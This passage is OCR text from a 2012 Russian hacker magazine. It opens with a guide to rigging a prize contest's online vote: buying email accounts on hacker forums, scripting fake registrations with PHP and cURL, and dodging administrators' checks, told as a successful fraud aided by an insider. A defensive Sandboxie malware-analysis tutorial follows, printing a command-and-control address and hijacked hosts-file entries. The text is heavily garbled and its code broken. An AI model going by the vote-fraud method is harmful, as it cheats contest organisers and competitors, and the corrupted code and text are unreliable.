интерфейс и проверить почту. Всего доступно 11 доменов. Скрипт 
с подробными комментариями по использованию ждет тебя 

на диске. 

Какой же из способов мы применим? К сожалению, нам при- 
дется потратиться на первый вариант, так как важность момента 
требует жертв. Мы не будем писать автореггер, а просто найдем 
на любом из хакерских форумов продавца аккаунтов, у которого 
можно купить адреса электронной почты, подходящие для провер- 




ки через расширение РНР ІМАР. Да, доступ к серверам почтовых 
сервисов осуществляется по-разному, поэтому нужно заранее 
узнать, какой из них нам подойдет, и лишь только потом закупать- 
ся аккаунтами. Лично мне подходит аккуант на Рамблере, так как 
никаких проблем с проверкой почты я там никогда не испытывал. 
Далее пишем воттакую вот функцию для получения тела послед- 
него письма: 

-Рипсіііоп §е1:Ме55а§е($1о§іп. $ра55могсІ){ 

$ітар = ітар орепС 

, {таі1.^атЫе^.^и:110/рорЗ/по1:15}INВОX , . 

$1оёіп, 

$раз5ыогсІ); 



і-р ( $ітар1{ 

$ЬосІу = іт ардргіпѣС 

ітар ЬосІѵ^ітар. (ітарпиттБ^ЗіітарІ - 1))); 
еІ5е{ге1:игп -РаІ5е;> 



геііигп $ ЬосІу; 

Ь- 

Эта функция возвращаеттекст последнего письма, пришедшего 
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С0ѴЕР5Т0КѴ 



в ящик. Подготовим все необходимые данные, а именно само мыло, 
имя, фамилию и пароль, для соответствующих переменных. Где 
взять адреса для активации аккаунтов, я рассказал выше, а мно- 
жество имен и фамилий легко найти в интернете. Пароль можно 
генерировать воттак: 

$рав5ыогсІ = 5иЬз1:г(тсІ5(1:іте()) , 0, гапсІ(6., 10)) .гапсІ(10 л 99) ; 



РЕГИСТРАЦИЯ 



Теперь все готово, и мы можем написать саму функцию регистрации, 
в чем нам снова поможет плагин ЫѵеНТТРНеасІегз. В данном случае 
у нас имеются Р05Т-данные, отправленные в виде тиШрагіЛогт- 
сіаіа. Достаточно просто подставить в лог со снифера свои значения 
и послать их в Р05Т-запросе курла (СІІРІ_0РТ_Р05Т, СІІРІ_0РТ_ 
Р05ТРІЕЮ5). 

Не забываем также о меняющемся значении заголовка Сопіепі- 
Туре и о том, что при запросе через тиШрагіЛогт-сІаІа нужно генери- 
ровать Ьоипсіагіез. Отправляемые пакеты целесообразно сохранить 
где-нибудь, например в базе Му50І_, для использования в дальней- 
шем. Сохранить необходимо логин и пароль от почты, пароль от акка- 
унта на сайте, юзер-агент, куки. Почему именно в дальнейшем? 

Потому, что сначала следует подождать, пока к нам на мейл 
придет активационное письмо. Но не стоиттратить время впустую, 
лучше заняться регистрацией аккаунтов, чтобы их было как можно 
больше. Таким образом, разумно разделить весь процесс на реги- 
страцию аккаунтов и накрутку и выполнять их, например, ночью 
и днем соответственно. 

Через некоторое время мы открываем сохраненные данные 
и ищем там логин и пароль от почты. Далее проверяем, нет ли 
в ящике письма: 

$ас1:іѵаііоп = §е1:Ме55а§е($етаЦ_1о§іп., $етаі1_ра55ы) ; 

Если письмо пришло, то выдираем ссылку активации простой 
регуляркой. Тут никаких особых проблем возникнуть не должно — 
просто формируем запрос на подтверждение регистрации (обяза- 
тельно вставляем геіюгег и добавляем куки и изег-адепі, выбранные 
ранее). Опять же, не забываем про загрузку всех элементов: создаем 
лог-файл со всеми запросами, парсим его и повторяем действия 
браузера. 

После получения всех данных и подтверждения регистрации 
нам остается только авторизоваться. Снова делаем запрос, эмули- 
руя браузер и сохраняем полученные куки в глобальной пере- 
менной. Таким же образом переходим на страницу видеоролика, 
который надо накрутить, и смотрим, куда А)ах отправляет запрос 
после нажатия на кнопку голосования. Последний шаг — отправка 
этого запроса через сЫРІ_. Все запросы желательно делать с трех- 
пятисекундной паузой. 

Как же автоматизировать процесс накрутки? Можно, конечно, 
использовать циклы, 5Іеер() и прочее непотребство, но я поступил 




Основной код накрутчика 

проще и сделал так, чтобы после прохода скрипта (без циклов, 
один голос за один запуск скрипта) в браузер выкидывался код 
ЭаѵаЗсгірІ, обновляющий страницу через одну-две минуты. С ав- 
томатизацией тебе точно так же поможет и стоп на каком-нибудь 
платном хостинге. 



ПОЛУЧИЛОСЬ ИЛИ НЕТ? 



Что мы получили в результате? Видеоролик постепенно набирал 
голоса посетителей и «лайки». Все шло гладко, посетителей при- 
бавлялось в три раза больше, чем лайков. Ночью голосование я 
отключал, так как иначе все это было бы подозрительно. Накрутив 
пару тысяч голосов, мой заказчик все-таки выиграл тот самый 
миллион, ну и я тоже получил небольшой пряник. Без награды 
не остались и еще одни участники этой истории — инсайдеры. 

Да, ради миллиона в компанию, проводившую это голосование, 
был заслан «Штирлиц», который информировал заказчика о неко- 
торых важных деталях. Как оказалось, кроме меня, были и другие 
накрутчики, причем таких претендентов специально не снимали 
с конкурса и не обнуляли их голоса — инсайдер доложил, что 
их выкинут в самом конце. Насчет нас, конечно же, изначально 
не возникло никаких подозрений :). 

Занимаясь накруткой, всегда смотри на этот процесс глазами 
администратора. Следует обратить внимание на всё, к чему можно 
прикопаться: время, заголовки, сессии, куки, ІР-адрес, мыло, 
скорость. Эти слова сразу же наводят на мысль, что учет всех ме- 
лочей очень замедляет процесс. Но сроки в данном случае как раз 
не поджимают. Советую тебе внимательно изучить все прилагаю- 
щиеся к статье скрипты, чтобы получить полное представление 
о том, как работает разработанный накрутчик. □□ 



ЧТО МОЖНО НАКРУЧИВАТЬ? 



1 


Партнерки 

Накрутка партнерок по трафику 
пользуется очень большим спро- 


2 


Популярные социальные сервисы 

Вконтакте, РасеЬоок, ѴоиТиЬе и про- 
чие знаменитые сайты часто исполь- 


3 



сом, но здесь далеко не все так просто, как 
кажется. Во-первых, придется проанализиро- 
вать множество ЭаѵаВсгірСов, встраиваемых 
в страницу, во-вторых, ты, скорее всего, стол- 
кнешься с проблемой привязки некоторых 
посылаемых данных к параметрам браузера, 
которые не так-то просто подделать. 



зуют разные голосования, «лаики» и другие 
средства для увеличения популярности 
разных объектов. Здесь также придется воз- 
иться с ЭаѵаВсгірГами и анализировать при- 
вязки к браузерам, а вдобавок разбираться 
с авторизацией, капчей и другими методами 
защиты от ботов. 



Голосования с призами 

В статье как раз идет речь о таком 
голосовании. Многие сайты с радо- 
стью проводят всевозможные голосования, 
которые, как правило, не составляет труда 
накрутить. Но даже в самом простом случае 
предварительно необходимо провести раз- 
ведку, чтобы учесть все параметры, которые 
могут использоваться для оценки уникально- 
сти каждого голоса. 
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30 страницжурнала на одной полосе. 
Тизер некоторых статей. 



Ргеѵіеѵѵ 



РС20МЕ 
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АЫОРОШНАРС 

Раньше мы стремились запустить на 
смартфоне приложения, которые на са- 
мом деле предназначены для десктопных 
ОС. Вспомни, хотя бы аігсгаск или какую- 
нибудь банальную утилиту для удален- 
ного рабочего стола. Теперьже наоборот 
— все чаще хочется прямо вѴѴіпсіоѵѵз 
пощупатьте приложения, которые из- 
начально появляются для мобильных 
платформ. Эмуляторы отразработчиков 
настолькотормозные, что использовать 
ихвесьма проблематично. Какзапустить 
на десктопе АпсІгоісІ-систему и, скажем, 
игры, которые не будуттормозить? Или 
наладитькамфорнуюотладкупри раз- 
работке мобильныхприложений? 

Читай в этой статье. 




РС20ЫЕ 



ВЗЛОМ 






ИГРЫ В ПЕСОЧНИЦЕ 




ГДЕ ХРАНИТЬ КОД? 
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Полный мануал потому, какнастроить 


44 


Разбираемся, где хостить репозитории 


58 




запсІЬох не только для безопасного за- 




с кодом своих разработок. Что лучше: 





пуска подозрительныхприложений, ной СіЖиЬ, ВііВискеІ, АззетЫа или может 

для подробного анализа бинарников. быть старый добрый БоигсеРогде? 



ТОТАЛЬНЫЙ ДЕСТРОЙМОЫОООВ 

Отсутствие 50І_в нереляционных СУБД 
не означает отсутствие возможности 
выполнитьинъекции. Разоблачаем миф 
о безопасности баз данных МоБОБ. 



СЦЕНА 



МАШАКЕ 






2ЕКОШ6НТ52011 




БУРИМАНТИВИРУС.ЕЩЕ ГЛУБЖЕ! 




72 


Десятки убойных докладов и конкурсов, 
невероятная хакерская атмосфера, 


74 


Какустроена проактивнаязащита и мо- 
ниторинг событий в популярных анти ви- 


82 



Обау-шоу — такпрошла конференция по русныхрешениях?Объясняемустройство 

информационной безопасности в Питере. НІР5 на пальцах. 



ИСТОРИЯ РУТКИТОВ 

Ты уже, наверное, и не вспомнишь по 
стелс-вирусы в МБ-005 — а мы пом- 
ним. Выбираем наиболее нашумевшие 
руткитыза последние 26 лет. 
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6гау.ЛаскІНе Ріхххег 



ИГРЫ 

В ПЕСОЧНИЦЕ 

ПРИСПОСАБЛИВАЕМ 5АЫ0В0ХІЕ ДЛЯ 
АНАЛИЗА ПОДОЗРИТЕЛЬНЫХ ФАЙЛОВ 








Неправильное 
использование 
описанной методики 
может нанести вред 
системе и привести 
кзаражению! 

Будь внимателен 
и осторожен. 



Есть два основных способа безопасно 
запустить подозрительный исполняемый 
файл: под виртуальной машиной или 
в так называемой «песочнице» (запсІЬох). 
Причем последнюю можно с помощью 
изящного способа адаптировать для 
оперативного анализа файла, не прибегая 
к специализированным утилитам и онлайн- 
сервисам и не используя множество ресурсов, 
как в случае с виртуалкой. О нем я и хочу тебе 
рассказать. 



«ПЕСОЧНИЦА» ДЛЯ АНАЛИЗА 

Люди, которые занимаются компьютерной 
безопасностью, хорошо знакомы с концепцией 
«песочницы». Если вкратце, «песочница» — 
эта тестовая среда, в которой выполняется 
некая программа. При этом работа налажена 
таким образом, что все действия программы 
отслеживаются, все изменяемые файлы и на- 
стройки сохраняются, но в реальной системе 
ничего не происходит. В общем, можешь 
запускать любые файлы в полной уверен- 
ности, что на работоспособность системы это 
никак не повлияет. Такие инструменты можно 
использовать не только для обеспечения 
безопасности, но и для анализа тех действий 



зловреда, которые он выполняет после за- 
пуска. Еще бы, ведь если есть слепок системы 
до начала активных действий и картина того, 
что произошло в «песочнице», можно легко 
отследить все изменения. 

Конечно, в Сети есть масса готовых онлайн- 
сервисов, которые предлагают анализ файлов: 
АпиЫз ( апиЬіз.ізесІаЬ.огд ), САМА5 ( сапгіаз. 
сотобо.сот/сді-Ьіп/зиЬппіі ). ТЬгеаіЕхрегІ 
( ѵѵѵѵѵѵ.іЬгеаІехрегСсопп ), ТЬгеаРГгаск ( ѵѵѵѵѵѵ. 
Ипгеаигаск.сот ]. Подобные сервисы использу- 
ют разные подходы и имеют свои достоинства 
и недостатки, но можно выделить и общие 
основные минусы: 

• Необходимо иметь доступ к интернету. 



• Необходимождатьочереди в процессеоб- 
работки (в бесплатных версиях). 

• Как правило, файлы, создаваемые или из- 
меняемые входе выполнения, не предостав- 
ляются. 

• Невозможно контролировать параметры 
выполнения (в бесплатных версиях). 

• Невозможно вмешиваться в процесс запуска 
(например, нажимать на кнопки появляю- 
щихся окон). 

• Какправило, невозможно предоставлять 
специфические библиотеки, необходимые 
для запуска (в бесплатных версиях). 

• Как правило, анализируются только испол- 
няемые РЕ-файлы. 
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Игры в «песочнице» 



Такие сервисы чаще всего строятся 
на основе виртуальных машин с установлен- 
ным инструментарием, вплоть до отладчиков 
ядра. Их можно организовать и дома. Однако 
эти системы достаточно требовательны к ре- 
сурсам и занимают большой объем на жестком 
диске, а анализ логов отладчика отнимает 
много времени. Это значит, что они весьма 
эффективны при глубоком исследовании 
определенных образцов, но вряд ли смогут 
оказаться полезными в рутинной работе, когда 
нет возможности нагружать ресурсы системы 
и тратить время на анализ. Использование 
«песочницы» для анализа позволяет обойтись 
без огромных затрат ресурсов. 

ПАРА ПРЕДУПРЕЖДЕНИЙ 

Сегодня мы попробуем сделать свой соб- 
ственный анализатор на основе «песочницы», 
а именно утилиты 5апбЬохіе. Эта программа 
доступна как условно-бесплатная на сайте 
автора ( ѵѵѵѵѵѵ.запбЬохіе.сот ). Для нашего ис- 
следования вполне подойдет ограниченная 
бесплатная версия. Программа запускает 
приложения в изолированной среде, так что 
они не производят вредоносных изменений 
в реальной системе. Нотут есть два нюанса: 

• 5апбЬохіе позволяет отслеживатьтолько 
программы на уровне изегтобе. Вся дея- 
тельность вредоносного кода в режимеядра 
не отслеживается. Поэтому максимум, что 
удастсяузнатьпри изучении руткитов — это 
каким образом вредонос внедряется в си- 
стему. Проанализировать само поведение 
науровнекегпеі тобе, ксожалению, невоз- 
можно. 

• В зависимости от настроек 5а п б Ьохіе 
можетблокировать выход в Сеть, разре- 
шать полный доступ или доступ только для 
отдельных программ. Понятно, что, если 
для нормального запуска вредоносу нужен 
выход в интернет, необходимо его предо- 
ставить. С другой стороны, если у тебя 

на флешке валяется РіпсЬ, который за- 
пускается, собирает все пароли в системе 
и отправляет их на Йр злоумышленнику, то 
ЗапбЬохіе с открытым доступом в интернет 




Работает ВиБІег ЗапсІЬох Апаіугег 
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Песочницы ЗапсіЬохіе 



не защитит тебя от потери конфиденци- 
альной информации! Это очень важно, и об 
этом следует помнить. 

ПЕРВИЧНАЯ НАСТРОЙКА 5АМ0В0ХІЕ 

ЗапбЬохіе — великолепный инструмент с боль- 
шим количеством настроек. Упомяну лишь те 
из них, которые необходимы для наших задач. 

После установки ЗапбЬохіе автоматически 
создается одна «песочница». Ты можешь до- 
бавить еще несколько «песочниц» под разные 
задачи. Доступ к настройкам «песочницы» 
осуществляется через контекстное меню. 

Как правило, все параметры, которые можно 
изменять, снабжены достаточно подробным 
описанием на русском языке. Для нас особенно 
важны параметры, перечисленные в разделах 
«Восстановление», «Удаление» и «Ограниче- 
ния». Итак: 

1. Необходимо убедиться, что в разделе «Вос- 
становление» ничего не указано. 

2. В разделе «Удаление» тоже не должно быть 
никаких отмеченных галок и/или добавлен- 
ных папок и программ. 

Если неправильно выставить параметры в раз- 
делах, указанных в пунктах 1 и 2, это может 
привести к тому, что вредоносный код заразит 
систему или все данные для анализа будут 
уничтожены. 

3. В разделе «Ограничения» необходимо вы- 
брать настройки, соответствующие твоим 



задачам. Практически всегда необходимо 
ограничивать доступ низкого уровня и ис- 
пользование аппаратных средств для всех 
выполняемых программ, чтобы не допу- 
стить заражения системы руткитами. А вот 
ограничивать доступ на запуск и выпол- 
нение, а также забирать права, наоборот, 
не стоит, иначе подозрительный код будет 
выполняться в нестандартной среде. Впро- 
чем, всё, в том числе и наличие доступа 
к интернету, зависит от задачи. 

4. Для наглядности и удобства в разделе 
«Поведение» рекомендуется включить 
опцию «Отображать границу вокруг окна» 
и выбрать цвет для выделения программ, 
выполняемых в ограниченной среде. 

ПОДКЛЮЧАЕМ ПЛАГИНЫ 

В несколько кликов мы получили отличную 
изолированную среду для безопасного вы- 
полнения кода, но не инструмент для анализа 
его поведения. К счастью, автор 5апсІ Ьохіе 
предусмотрел возможность использования 
целого ряда плагинов для своей программы. 
Концепция довольно интересна. Аддоны пред- 
ставляют собой динамические библиотеки, 
внедряемые в выполняемый в «песочнице» 
процесс и определенным образом регистриру- 
ющие или модифицирующие его выполнение. 

Нам понадобится несколько плагинов, 
которые перечислены ниже. 



ЧТО УМЕЕТ И НЕ УМЕЕТ ИНСТРУМЕНТ 



Полученный инструментумеет: 

• Отслеживать АРІ- вызовы запущенного при- 
ложения. 

• Отслеживать новые создаваемые файлы 
и параметры реестра. 

• Перехватыватьсетевойтрафикпри выполне- 
нии приложения. 

• Проводить базовый анализ файлов и их пове- 
дения (встроенный поведенческий анали- 
затор, анализ на ѴігиэТоІаІ по хешам, анализ 

с помощью РЕЮ, Ехеіп^о и 5збеер и т. д.). 

• Получать некоторую дополнительную 
информацию за счет вы пол нения в «песочни- 



це» вспомогательных программ (например, 
Ргосеэз Мопііог) вместе с анализируемой. 

Этотинструментне может: 

• Анализироватьзловреды, выполняющиеся 

в кегпеі тобе (требующие установки драйве- 
ра). Тем не менее возможно выявить механизм 
установки драйвера (до его фактического 
внедрения в систему). 

• Анализироватьзловреды, отслеживающие 
выполнение в 5а пб Ьохіе. Однако Ви5Іег 
5апбЬох Апаіугег включает в себя ряд меха- 
низмов, препятствующих та ко му отслежива- 
нию. 
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РС20ЫЕ 



1. ВизіегБапсІЬохАпаІѵгеН Ьза.ізоіЧѵѵаге.пІ ). 

2. БВІЕхіга ( Ьіі.Іѵ/гРЬРЬа ). Этот плагин осѵ- 
ществляетперехватряда функций для вы- 
полняемой в песочнице программы, чтобы 
блокировать следующие возможности: 

• обзор исполняемых процессов и потоков; 

• доступ кпроцессам вне пределов «пе- 
сочницы »; 

• вызов функции ВІоскІприІ (ввод с кла- 
виатуры и мыши); 

• считывание за головков активных окон. 

3. АпЬсІеІ [ Ьіі.Іу/ирУАіУ І.Аддон перехватывает 
функции, отвечающие за удаление файлов. 
Таким образом, все временные файлы, коман- 
да наудалениекоторыхпоступаетотисходно- 
го кода, всеравноостаются на своихместах. 

Как интегрировать их в «песочницу»? Поскольку 
это не предусмотрено средствами интерфейса 
БапсІЬохіе, редактировать файл конфигурации 
придется вручную. В папке, куда мы установили 
БапсІЬохіе, создаем папку РІидіпз и распаковы- 
ваем в нее все подготовленные плагины. Теперь 
внимание: в состав Визіег БапсІЬох Апаіугег 
входит несколько библиотек с общим именем 
І_06_АРІ*сІІІ, которые могут инжектироваться 
в процесс. Есть два типа библиотек: ѴегЬозе 
и БіапсІагсІ. Первый отображает практически пол- 
ный список вызовов АРІ, выполняемых програм- 
мой, включая обращения к файлам и реестру, 
второй — сокращенный список. Сокращение 
позволяетускорить работу и уменьшить журнал, 
который затем придется анализировать. Лично 
я не боюсь больших логов, зато опасаюсь того, 
что какая-нибудь нужная инфа будет заботливо 
«сокращена», поэтому выбираю ѴегЬозе. Именно 
эту библиотеку мы и будем инжектировать. Чтобы 
зловред не смог заметить инжект библиотеки 
по ее имени, применим простейшую меру предо- 
сторожности: сменим имя І_06_АРІ_ѴЕРВ05Е.сІІІ 
на любое другое, например БАРР.сІІІ. 

Теперь в главном окне БапсІЬохіе выбираем 
«Настроить -> Редактировать конфигура- 
цию». Откроется текстовый конфиг со всеми 




Скачиваем образец малвари для анализа 



настройками программы. Сразу обращаем 
внимание на следующие строки: 

• Параметр РіІеРооіРаіЬ в разделе 
[СІоЬа ІЗеШпдз] указывает общий путь 
к папке изолированной среды, то есть 

к папке, где будут находиться все файлы 
«песочницы». У меня этот параметр имеет 
вид РіІеРооіРаіЬ=С:\5апсІЬох\%5АМРВОХ 0 /о. 

• Раздел [С1зег5еШпд5_ХХХХХХХ] нас не инте- 
ресует — его пропускаем и листаем дальше. 

• Затем идет раздел, имя которого совпадает 
с названием «песочницы» (пусть это будет 
В5А). Сюда мы и будем добавлять плагины: 

[В5А] 

Іпіес1:Р11=С : \Рго§гат Рі1ез\5апсІЬохіе\ 

Р1и§іпз\зЬіех1:га . сііі 

Іпіес1:Р11=С : ХРго^гат Рі1ез\$апсІЬохіе\ 

Р1и§іпз\аігЬіс[е1 . сііі 

Іпз‘есЬР11=С : \Рго§гаш Рі1ез\5апсІЬохіе\ 

РІи^іпзМАРР.сІІІ 

0реп1лІіпС1азз=ТРогтВ5А 

ЕпаЫесІ=у 

Сопб§І_еѵе1=7 

ВохІ\ІатеТі1:1е=п 

ВогсІегСо1ог=#0000РР 

Мо1:і-РуІп1:егпе1:Ассе55РепіесІ=у 

Тетр1а1:е=В1оскРог1:5 



Пути, конечно, могут отличаться. Но порядок 
инжектируемых библиотек обязательно должен 
быть именнотаким! Это требование связано 
с тем, что перехват функций должен осущест- 
вляться именно в указанном порядке, иначе 
плагины работать не будут. Чтобы применить 
изменения, выбираем в главном окне БапсІЬохіе: 
«Настроить -> Перезагрузить конфигурацию». 

Теперь настроим сам плагин Визіег БапсІЬох 
Апаіугег. 

• Запускаем плагин вручную, воспользовав- 
шись файлом Ьза.ехе из папки РІидіпз. 

• Выбираем «ОрЬопз -> Апаіузіз тосіе -> 
МапиаІ» и далее «ОрЬопз -> Ргодгат 
ОрЬопз -> ѴѴіпсІоѵѵз БЬеІІ ІпІедгаЬоп -> АсісІ 
гідЫ-сІіск асЬоп "Рип В5А М ». 

Теперь всё готово для работы: наша «песочни- 
ца» интегрирована в систему. 

ПРАКТИЧЕСКОЕ ПРИМЕНЕНИЕ 

Попробуем наш инструмент на реальной 
угрозе. Чтобы никто не упрекнул меня в под- 
тасовке, я поступил просто: зашел на ѵѵѵѵѵѵ. 
таіѵѵагесіотаіпіізі.сот и скачал последнее, 
что там появилось на момент написания 
статьи. Это оказался премилый файл рр.ехе 
с какого-то зараженного сайта. Одно только 
название внушает большие надежды, кроме 
того, на этот файл сразу заорал мой антивирус. 
К слову, все наши манипуляции лучше произ- 
водить при отключенном антивирусе, иначе мы 
рискуем заблокировать/удалить что-нибудь 
из того, что исследуем. Как изучить поведения 
бинарника? Просто нажимаем правой кнопкой 
на этот файл и выбираем в выпавшем меню 
пункт Рип В5А. Откроется окно Визіег БапсІЬох 
Апаіугег. Внимательно смотрим в строку 
БапсІЬох 1"оІсІег Іо сЬеск. Все параметры должны 
совпадать с теми, которые мы указали при 
настройке БапсІЬохіе, то есть если песочница 
получила название В5А, а в качестве пути 
к папке был задан параметр РіІеРооіРаіЬ=С:\ 
5апсІЬох\%5АІ\ІРВ0Х%, то всё должно быть 



РОРТАВЬЕ-ВЕРСИЯ «ПЕСОЧНИЦЫ» 



Безусловно, многим не понравится, что надо 
что-то устанавливать, настраивать и т. д. Так 
как меня всё это тоже не прельщает, я сделал 
портабельную версию инструмента, который 
можно запускать без установки и настройки, 
прямо с флешки. Скачать такую версию можно 
здесь: ЩоІз.заіегопе.сс/а^/БапсІЬохіе-рогіаЫе.гір . 
Для запуска «песочницы» достаточно выполнить 
скрипт зіагі.стсі, а по окончании работы 
не забыть выполнить скрипт зіор.стсі, который 
полностью выгрузит драйвер и все компоненты 
из памяти, а также сохранит внесенные в ходе 
работы изменения в портабеле. 

Настроек у самого портабелизатора совсем 
не много: его работа в основном основана 
на манипуляциях с файлом БапсІЬохіе. іпі. 
іет р!а1:е, находящегося в папке ТетрЫез. 



По сути, этот файл представляет собой файл 
настроек БапсІЬохіе, который должным образом 
обрабатывается и передается программе, 
а по окончании работы перезаписывается 
обратно в Тетріаіез. Если открыть этот 
файл «Блокнотом», то ты вряд ли найдешь 
что-то интересное. Нужно обязательно 
обратить внимание на шаблон $(ІпзІаІІРгіѵе], 
повторяющийся в ряде параметров пути. 
Особенно нас интересует параметр РіІеНооіРаіЬ. 
Если он имеет следующий вид: 

Рі1еКоо1:Ра1:Ь=$(Іп5І:а110гіѵе)\ 

5апсІЬох\%5АІ\ЮВОХ% 

— то «песочницы» будут создаваться 
на диске, где находится портабельная БапсІЬохіе. 



Если же параметр имеет, например, такой вид: 
Рі1еКоо1=Ра1=Ь=С : \5апсІЬох\%5АІМРВОХ% 

— иначе говоря в нем указан определенный 
системный диск, то «песочницы» будут 
создаваться на этом диске. 

Лично я рекомендую всегда создавать 
песочницы на локальных дисках. Это ускоряет 
работу инструмента, а при запуске с флешки — 
ускоряет на порядки. Если же тебя настолько 
замучила паранойя, что хочется всё запускать 
и анализировать на любимом носителе, 
который ты носишь у сердца, то параметр 
можно поменять, но тогда хотя бы используй 
портабельные жесткие диски, чтобы всё 
безбожно не тормозило. 



038 



ХАКЕР 02/157/2012 




Игры в «песочнице» 




Чеклист подозрительного поведения приложения 




Отчет о проведенном анализе 



как на скриншоте «Работает Визіег ЗапсІЬох 
Апаіугег». Если же ты знаешь толк в извра- 
щениях и назвал песочницу по-другому или 
настроил параметр РіІеРооіРаіЬ на другой 
диск или папку, его нужно изменить соответ- 
ствующим образом. В противном случае Визіег 
ЗапсІЬох Апаіугег не будет знать, где искать 
новые файлы и изменения в реестре. 

В5А включает в себя массу настроек 
по анализу и изучению процесса выполнения 
бинарника, вплотьдо перехвата сетевых паке- 
тов. Смело нажимай кнопку Зіагі; Апаіузіз. Окно 
перейдет в режим анализа. Если песочница, 
выбранная для анализа, по каким-то причинам 
содержит результаты предыдущего исследо- 
вания, утилита предложит предварительно ее 
очистить. Все готово к запуску исследуемого 
файла. 

Готов? Тогда нажми на изучаемый файл 
правой кнопкой мыши и в открывшемся меню 
выбери «Запустить в песочнице», после чего 
укажи ту «песочницу», к которой мы прикру- 
тили В5А. 

Сразу после этого в окне анализатора 
побегут АРІ-вызовы, которые будут фиксиро- 
ваться в лог-файлах. Обрати внимание, что 
сам Визіег ЗапсІЬох Апаіугег не знает, когда 
завершится анализ процесса, фактически 
сигналом к окончанию служит именно твое 
жмакание на кнопку РіпізЬ Апаіузіз. Как же 
узнать, что время уже наступило? Тут может 
быть два варианта. 




Окна, программ запущенные в песочнице, теперь будут 
выделяться 



1. В окне ЗапсІЬохіе не отображается ни один 
выполняемый процесс. Это означает, что 
выполнение программы явно завершилось. 

2. В списке АРІ-вызовов долгое время не по- 
является ничего нового или, наоборот, одно 
и то же выводится в циклической после- 
довательности. При этом в окне ЗапсІЬохіе 
что-то еще выполняется. Такое бывает, 
если программа настроена на резидентное 
выполнение или попросту зависла. В этом 
случае ее необходимо вначале завершить 
вручную, нажав правой кнопкой в окне 
БапсІ Ьохіе на соответствующую «песоч- 
ницу» и выбрав «Завершить программы». 
Кстати, при анализе моего рр.ехе произо- 
шла именно такая ситуация. 

После этого можно смело выбирать РіпізЬ 
Апаіузіз в окне Визіег ЗапсІЬох Апаіугег. 

АНАЛИЗ ПОВЕДЕНИЯ 

Нажав на кнопку Маіѵѵаге Апаіугег, мы сразу 
получим некоторую сводную информацию о ре- 
зультатах исследования. В моем случае вре- 
доносность файла была совершенно очевидна: 
в ходе выполнения создавался и запускался 
файл СЛОоситепІз апсі 5еШпдз\Администра- 
тор\АррІісаІіоп ОаІаѴірІаузѵг.ехе, который 
добавлялся в автозагрузку (кстати, именно 
он не хотел завершаться сам), происходило 
соединение с 190.9.35.199 и модифицировался 
бозіз-файл. Кстати, при этом на ѴігизТоІаІ 
файл детектировали только пять антивирусных 
движков, что видно из логов. 

Всю информацию о результатах анализа 
можно получить непосредственно в меню 
Ѵіеѵѵег в окне Визіег ЗапсіЬох Апаіугег. 

Здесь же приютился и журнал АРІ-вызовов, 
который, безусловно, будет полезен при 
подробном исследовании. Все результаты 
хранятся в виде текстовых файлов в подпап- 
ке Рерогіз папки Визіег ЗапсІЬох Апаіугег. 
Особый интерес представляет отчет РерогЕ 
Іхі (вызывается через Ѵіеѵѵ Рерогі), в кото- 
ром приводится расширенная информация 
по всем файлам. Именно оттуда мы узнаём, 
что временные файлы на самом деле были 
исполняемыми, соединение шло по адре- 



су Шр://190.9.35.199/ѵіеѵѵ.рЬр?гпб=787714, 
вредонос создал специфический мутекс 
64Р6ЕХѴѴкЫѴАМг и т. д. Можно не только 
просматривать отчеты, но и извлекать все 
файлы, созданные в ходе выполнения. Для 
этого в окне ЗапсІЬохіе нажми правой кноп- 
кой по «песочнице» и выбери «Просмотреть 
содержимое». Откроется окно проводника 
со всем содержимым нашей «песочницы»: 
в папке сігіѵе находятся файлы, создавае- 
мые на физических дисках «песочницы», а в 
папке изег — файлы, создаваемые в профи- 
ле активного пользователя (%изегрго1ч1е%). 
Здесь я обнаружил сіріаузѵг.ехе с библио- 
текой брІаух.сІІІ, временные файлы Ітр и из- 
мененный файл Ьозіз. Кстати, оказалось, что 
в него добавлены следующие строки: 

94.63.240.117 ммм.§оо§1е.сот 

94.63.240.118 ммм. Ьіп^. сот 

Учти, что в «песочнице» валяются за- 
раженные файлы. Если их нечаянно запу- 
стить двойным кликом, ничего не будет (они 
запустятся в «песочнице»), но если ты их 
куда-то скопируешь, а потом выполнишь... хм, 
ну, ты понял. Здесь же, в папке, можно найти 
дамп реестра, измененного в ходе работы, 
в виде файла РедНіѵе. Этот файл можно легко 
перевести в более читабельный гед-файл при 
помощи следующего командного скрипта: 

КЕб ЮАР НКШХиииБапсІЬохиии Ке^Ніѵе 
КЕС ЕХРОКТ НКІ_М\ииизапсІЬохиии запсІЬох.ге§ 
КЕ6 ЦІМІ.ОАР НКІ_М\ииизапсІЬохиии 
поТерасІ запсІЬох.ге§ 

Таким образом, ты получишь запсІЬох.гед, 
в котором указаны строки, внесенные злов- 
редом в ходе выполнения. После выполнения 
анализа выбери в меню ОрЕопз пункт СапсеІ 
апаіузіз, чтобы вернуть всё как было. Учти, что 
после этой операции все журналы анализа 
будут удалены, но содержимое «песочницы» 
останется на месте. Впрочем, при следую- 
щем запуске программа сама предложит все 
удалить. И-И 



ХАКЕР 02/157/2012 



039 





РС20ЫЕ 



Аікігою 

нах8о 

КАК ИСПОЛЬЗОВАТЬ 
А№КОЮ НА ОБЫЧНОМ 
КОМПЕ 



Антон «Апі» Жуков (а.гИикоѵйгеаІ.хакер.ги) 





І'М'.'І 

Более подробную 
информацию об 
утилите АБВ и всех 
ее параметрах ты 
можешь посмотреть 
на официальном 
сайте — Ьіі.іѵ/259Ь01 



Как запустить мобильные приложения на 
компьютере? В пакете для разработчика 
АпбгоісІ есть специальный эмулятор, 
позволяющий пощупать мобильную ОС. Одна 
проблема — он тормозит. Прямо скажем, 
сильно тормозит. Но, к счастью, уже довольно 
давно ведется работа над интересным 
проектом по портированию платформы АпбгоісІ 
на платформу РС. 




Параметр ѵда=азк позволяет вручную выбрать нужный видеорежим 



АМОРОЮ-Х86 

Как известно, исходники АпсІгоісІ открыты — такова политика 
боодіе. Поэтому у любого желающего в принципе есть возмож- 
ность взять за основу исходную версию мобильной ОС и начать 
разработку своей собственной ветки. Многие энтузиасты активно 
выпускают патчи, реализующие дополнительный функционал, 
которого нет в оригинальном АпсІгоісІ. 

Именно так появился проект «раісб Ьозііпд Іюг апбгоісі х86 
зиррогі». Разработчики планировали выпускать патчи для под- 
держки х86-платформы. Но после нескольких месяцев работы они 
поняли, что способны на большее, чем просто поставлять патчи. 
Так появился проект АпсІ гоісі -х86 [ ѵѵѵѵѵѵ.апс1гоісІ-х86.ога ) — спе- 
циальная версия мобильной ОС для запуска на самом обычном 
компьютере. У АпсІ гоісі -х86, как и у АпсІгоісІ, есть разные ветки. 

